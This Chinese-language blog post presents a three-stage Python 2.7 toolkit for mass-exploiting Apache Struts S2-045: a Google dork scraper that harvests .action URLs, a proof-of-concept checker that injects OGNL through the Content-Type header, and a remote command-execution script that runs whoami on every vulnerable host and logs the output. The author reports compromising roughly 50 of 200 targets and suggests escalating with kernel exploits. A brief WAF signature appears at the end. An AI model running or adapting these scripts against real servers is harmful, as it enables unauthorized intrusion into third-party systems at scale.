批量Struts S2-045漏洞检测及利用


前言

S2-045远程代码执行漏洞的CNVD详细信息:http://www.cnvd.org.cn/flaw/show/CNVD-2017-02474漏洞刚出现时候,Google随便搜索相关URL(filetype:action||ext:action),利用后发现有很多甚者使用ROOT用户启动Tomcat,啧啧啧。。。

目前,很多公司已经紧锣旗鼓地修复了漏洞,尽管如此,互联网上还是有大批未修复的目标。。。可能感觉无所谓吧

批量S2-045用python 2.7实现,代码共分三部分,比较糙,多指正。 

第一部分:从Google批量抓取目标URL;

第二部分:验证筛选存在漏洞的URL;

第三部分:远程命令执行
一、Google抓取URL

目标URL抓取,可能会被Google限制抓取次数,若有IP资源,可以不断更换代理、多线程抓取。 

—keywords文件—–>抓取关键词,例如:filetype:action、ext:action

—urser-agent文件—–>随机ua抓取

—urlresult文件—–>存储抓取的url

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Create by Meibenjin.
# Modified by William
# Last updated: 2017-03-10
# google search results crawler

import sys
import urllib2, socket, time
import gzip, StringIO
import re, random, types
from bs4 import BeautifulSoup

base_url = 'https://www.google.com.hk/'
results_per_page = 10
user_agents = list()

# results from the search engine
class SearchResult:
    def __init__(self):
        self.url = ''

    def getURL(self):
        return self.url

    def setURL(self, url):
        self.url = url

    def printIt(self, prefix=''):
        print 'url\t->', self.url

    def writeFile(self, filename):
        file = open(filename, 'a')
        try:
            file.write(self.url + '\n')
        except IOError, e:
            print 'file error:', e
        finally:
            file.close()

class GoogleAPI:
    def __init__(self):
        timeout = 40
        socket.setdefaulttimeout(timeout)

    def randomSleep(self):
        sleeptime = random.randint(60, 120)
        time.sleep(sleeptime)

    # extract a url from a link
    def extractUrl(self, href):
        url = ''
        pattern = re.compile(r'(http[s]?://[^&]+)&', re.U | re.M)
        url_match = pattern.search(href)
        if (url_match and url_match.lastindex > 0):
            url = url_match.group(1)
        return url

    # extract serach results list from downloaded html file
    def extractSearchResults(self, html):
        results = list()
        soup = BeautifulSoup(html, "html.parser")
        div = soup.find('div', id='search')
        if (type(div) != types.NoneType):
            #modify 'li' to 'div'
            lis = div.findAll('div', {'class': 'g'})
            if (len(lis) > 0):
                for li in lis:
                    result = SearchResult()
                    h3 = li.find('h3', {'class': 'r'})
                    if (type(h3) == types.NoneType):
                        continue
                    # extract url from h3 object
                    link = h3.find('a')
                    if (type(link) == types.NoneType):
                        continue
                    url = link['href']
                    url = self.extractUrl(url)
                    if (cmp(url, '') == 0):
                        continue
                    result.setURL(url)
                    results.append(result)
        return results

    # search web
    # @param query -> query key words
    # @param lang -> language of search results
    # @param num -> number of search results to return
    def search(self, query, lang='en', num=results_per_page):
        search_results = list()
        query = urllib2.quote(query)
        if (num % results_per_page == 0):
            pages = num / results_per_page
        else:
            pages = num / results_per_page + 1
        for p in range(0, pages):
            start = p * results_per_page
            url = '%s/search?hl=%s&num=%d&start=%s&q=%s' % (base_url, lang, results_per_page, start, query)
            retry = 3
            while (retry > 0):
                try:
                    request = urllib2.Request(url)
                    length = len(user_agents)
                    index = random.randint(0, length - 1)
                    user_agent = user_agents[index]
                    request.add_header('User-agent', user_agent)
                    request.add_header('connection', 'keep-alive')
                    request.add_header('Accept-Encoding', 'gzip')
                    request.add_header('referer', base_url)
                    response = urllib2.urlopen(request)
                    html = response.read()
                    if (response.headers.get('content-encoding', None) == 'gzip'):
                        html = gzip.GzipFile(fileobj=StringIO.StringIO(html)).read()
                    results = self.extractSearchResults(html)
                    search_results.extend(results)
                    break;
                except urllib2.URLError, e:
                    print 'url error:', e
                    self.randomSleep()
                    retry = retry - 1
                    continue
                except Exception, e:
                    print 'error:', e
                    retry = retry - 1
                    self.randomSleep()
                    continue
        return search_results

def load_user_agent():
    fp = open('./user_agents', 'r')
    line = fp.readline().strip('\n')
    while (line):
        user_agents.append(line)
        line = fp.readline().strip('\n')
    fp.close()

def crawler():
    # Load use agent string from file
    load_user_agent()

    # Create a GoogleAPI instance
    api = GoogleAPI()

    # set expect search results to be crawled
    expect_num = 100
    # if no parameters, read query keywords from file
    if (len(sys.argv) < 2):
        keywords = open('./keywords', 'r')
        keyword = keywords.readline()
        while (keyword):
            results = api.search(keyword, num=expect_num)
            for r in results:
                r.printIt()
                r.writeFile('urlresult')
            keyword = keywords.readline()
        keywords.close()
    else:
        keyword = sys.argv[1]
        results = api.search(keyword, num=expect_num)
        for r in results:
            r.printIt()
            r.writeFile('urlresult')

if __name__ == '__main__':
    crawler()

二、POC漏洞验证

验证是否有s2-045漏洞

—urlresult文件—–>已存储的抓取的url

—detectreslut文件—–>存储验证成功的url

# -*- coding: utf-8 -*-

import urllib2

S2_045 = {"poc": "%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('fuck')).(#o.close())}", "key": "fuck"}


def poccheck(timeout):
    urls = open('../GoogleSearch/urlresult', 'r')
    detectresults = open('./detectresult', 'w')
    for url in urls.readlines():
        url = url.strip('\n')
        url = url.split('%3F', 1)[0]
        request = urllib2.Request(url)
        request.add_header("Content-Type", S2_045["poc"])
        request.add_header("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0")
        try:
            res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
        except Exception,e:
            print 'exception:'+url
        if S2_045['key'] in res_html:
            print S2_045['key']+':'+url
            detectresults.write(url+'\n')
    urls.close()
    detectresults.close()

if __name__ == "__main__":
    print poccheck(10)
三、远程命令执行

在已发现的具有漏洞的URL基础上,执行远程命令。

代码中执行whoami,有的已验证漏洞URL,远程命令执行会捕获异常或返回html页面,猜测目标structs2并未修复,只是在应用层的检测和响应做出防御。 

—detectreslut文件—–>已存储的验证成功的url

—exploitresult文件—–>存储whoami执行结果

# -*- coding: utf-8 -*-

import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers

def exploit():
    urls = open('../S2045Detection/detectresult', 'r')
    exploitresults = open('./exploitresult', 'w')
for url in urls.readlines():
        url = url.strip('\n')
        register_openers()
        datagen, header = multipart_encode({"image1": url})
        header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        header["Content-Type"]="%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+'whoami'+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        request = urllib2.Request(url,datagen,headers=header)
try:
            response = urllib2.urlopen(request, timeout=10)
            result = response.read(204800)
except Exception, e:
print 'exception:'+url
else:
if len(result) > 100:
print 'html:'+url
else:
print result.strip('\n')+':'+ url
                exploitresults.write(result)
    urls.close()
    exploitresults.close()

if __name__ == "__main__":
    exploit()


结果:

抓取不到300个URL就被Google返回503状态码,可以考虑付费API、更换代理、多进程进一步改进效率。

小范围统计,约200个目标URL,返回50个具有漏洞的URL。

对于Linux系统,即使为非root用户,但结合本地提权漏洞(例如 dirtycown 之类的内核漏洞,对于多说生产环境的server,多数没有被修复),危害甚大。


关于防护:


除了升级到要求的struct2框架版本外,可以考虑暂时设置WAF规则拦截攻击行为。


附:Imperva WAF拦截规则


 Signature Pattern: part="Content-Type", part="multipart/form-data", part="_memberAccess", rgxp="^Content-Type\s*:[^\x0A\x0D]*multipart\/form-data[^\x0A\x0D]*_memberAccess"

 Protocols: http, https

 Search Signature In: Headers

referer:


https://github.com/meibenjin/GoogleSearchCrawler


https://github.com/ysrc/xunfeng/blob/master/vulscan/vuldb/st2_eval.py


*本文作者:wwwillgaiiam



扫描二维码,在手机上阅读

该替换你的赛门铁克(Symantec)证书了,一波免费证书来袭

重要通知: 多说即将关闭,多说关闭,多说倒闭了

评 论